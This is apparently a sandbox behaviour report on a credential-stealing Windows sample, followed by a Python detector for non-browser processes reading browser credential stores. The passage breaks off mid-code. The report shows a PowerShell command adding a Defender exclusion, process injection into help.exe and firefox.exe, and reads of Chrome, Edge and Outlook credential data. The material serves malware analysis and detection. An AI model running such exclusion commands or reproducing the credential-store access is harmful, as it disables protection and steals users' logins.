Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Code function: 3_2_01976A50 mov eax, dword ptr fs:[00000030h] (3_2_01976A50)
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Code function: 3_2_01976A50 mov eax, dword ptr fs:[00000030h] (3_2_01976A50)
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Code function: 3_2_01976A50 mov eax, dword ptr fs:[00000030h] (3_2_01976A50)
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Code function: 3_2_01976A50 mov eax, dword ptr fs:[00000030h] (3_2_01976A50)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtQueryVolumeInformationFile: Direct from: 0x776D2F2C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtQuerySystemInformation: Direct from: 0x776D48CC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtAllocateVirtualMemory: Direct from: 0x776D48EC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtOpenSection: Direct from: 0x776D2E0C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtDeviceIoControlFile: Direct from: 0x776D2AEC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtAllocateVirtualMemory: Direct from: 0x776D2BEC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtQueryInformationProcess: Direct from: 0x776D2C26
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtResumeThread: Direct from: 0x776D2FBC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtWriteVirtualMemory: Direct from: 0x776D490C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtCreateUserProcess: Direct from: 0x776D371C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtClose: Direct from: 0x776D2B6C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtAllocateVirtualMemory: Direct from: 0x776D3C9C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtSetInformationThread: Direct from: 0x776C63F9
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtQueryAttributesFile: Direct from: 0x776D2E6C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtSetInformationThread: Direct from: 0x776D2B4C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtReadVirtualMemory: Direct from: 0x776D2E8C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtCreateKey: Direct from: 0x776D2C6C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtResumeThread: Direct from: 0x776D36AC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtMapViewOfSection: Direct from: 0x776D2D1C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtWriteVirtualMemory: Direct from: 0x776D2E3C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtCreateMutant: Direct from: 0x776D35CC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtAllocateVirtualMemory: Direct from: 0x776D2BFC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtDelayExecution: Direct from: 0x776D2DDC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtProtectVirtualMemory: Direct from: 0x776C7B2E
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtQuerySystemInformation: Direct from: 0x776D2DFC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtReadFile: Direct from: 0x776D2ADC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtTerminateThread: Direct from: 0x776D2FCC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtQueryInformationToken: Direct from: 0x776D2CAC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtCreateFile: Direct from: 0x776D2FEC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtOpenFile: Direct from: 0x776D2DCC
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtOpenKeyEx: Direct from: 0x776D2B9C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtNotifyChangeKey: Direct from: 0x776D3C2C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtSetInformationProcess: Direct from: 0x776D2C5C
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; NtProtectVirtualMemory: Direct from: 0x776D2F9C
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Memory written: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Section loaded: NULL target: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe protection: execute and read and write
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Section loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe; Section loaded: NULL target: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe; Section loaded: NULL target: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe; Thread register set: target process: 7072
Source: C:\Windows\SysWOW64\help.exe; Thread APC queued: target process: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Process created: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe; Process created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"
Source: C:\Windows\SysWOW64\help.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3290465246.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000000.911706916.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290821151.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
Source: vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3290465246.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000000.911706916.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290821151.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
Source: vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3290465246.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000000.911706916.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290821151.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
Source: vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3290465246.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000000.911706916.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290821151.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Queries volume information: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe VolumeInformation
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

                Source: Yara matchFile source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.990094154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3290778849.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3290725167.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3288875125.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.992572744.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3292767539.0000000004AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.998384257.0000000002690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3290872788.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
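The access pattern above (a signed Windows binary, help.exe, opening Chrome and Edge Login Data, Web Data, Cookies and Local State files plus the Outlook MAPI profile key) is the detectable part of the credential theft. The following detector is an added example and is not part of the Joe Sandbox report: it takes "process opened file/key" events of the same shape as the lines above and flags any process other than the browser or mail client that owns the store. The owner table (chrome.exe, msedge.exe, outlook.exe) and the event shape are assumptions for the example; the first four sample events are copied from the report, the last two are constructed benign controls.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable, Optional

# Chrome/Edge profile stores. The optional subdirectory group covers both the
# classic "Default\Cookies" location and the newer "Default\Network\Cookies"
# path that appears in the report.
BROWSER_STORE_RE = re.compile(
    r"\\(?P<vendor>Google\\Chrome|Microsoft\\Edge)\\User Data\\"
    r"(?:[^\\]+\\)*(?P<store>Login Data|Web Data|Cookies|Local State)$",
    re.IGNORECASE,
)

# MAPI profile store opened by help.exe in the report.
MAIL_PROFILE_PREFIX = (
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
    r"\Windows Messaging Subsystem\Profiles"
)

# Assumption for this example: only the browser's own image should read its
# profile stores, and only a mail client should open the MAPI profile key.
EXPECTED_OWNER = {"google\\chrome": "chrome.exe", "microsoft\\edge": "msedge.exe"}
MAIL_CLIENTS = {"outlook.exe"}


@dataclass(frozen=True)
class Event:
    image: str    # full path of the process image
    target: str   # file path or registry key that was opened
    kind: str     # "file" or "key"


@dataclass(frozen=True)
class Finding:
    image: str
    target: str
    reason: str


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: Event) -> Optional[Finding]:
    """Return a Finding when a process outside the owner set touches a credential store."""
    proc = image_name(ev.image)
    if ev.kind == "file":
        m = BROWSER_STORE_RE.search(ev.target)
        if not m:
            return None
        owner = EXPECTED_OWNER[m.group("vendor").lower()]
        if proc == owner:
            return None
        return Finding(ev.image, ev.target, f"{proc} read {m.group('store')} belonging to {owner}")
    if ev.kind == "key":
        if ev.target.lower().startswith(MAIL_PROFILE_PREFIX.lower()) and proc not in MAIL_CLIENTS:
            return Finding(ev.image, ev.target, f"{proc} opened the Outlook MAPI profile store")
    return None


def scan(events: Iterable[Event]) -> list[Finding]:
    return [f for f in map(classify, events) if f is not None]


OUTLOOK_KEY = MAIL_PROFILE_PREFIX + "\\Outlook\\"

# First four events are the report's own lines; the last two are constructed
# benign controls (the browser and the mail client reading their own data).
SAMPLE_EVENTS = [
    Event(r"C:\Windows\SysWOW64\help.exe",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data", "file"),
    Event(r"C:\Windows\SysWOW64\help.exe",
          r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies", "file"),
    Event(r"C:\Windows\SysWOW64\help.exe",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State", "file"),
    Event(r"C:\Windows\SysWOW64\help.exe", OUTLOOK_KEY, "key"),
    Event(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
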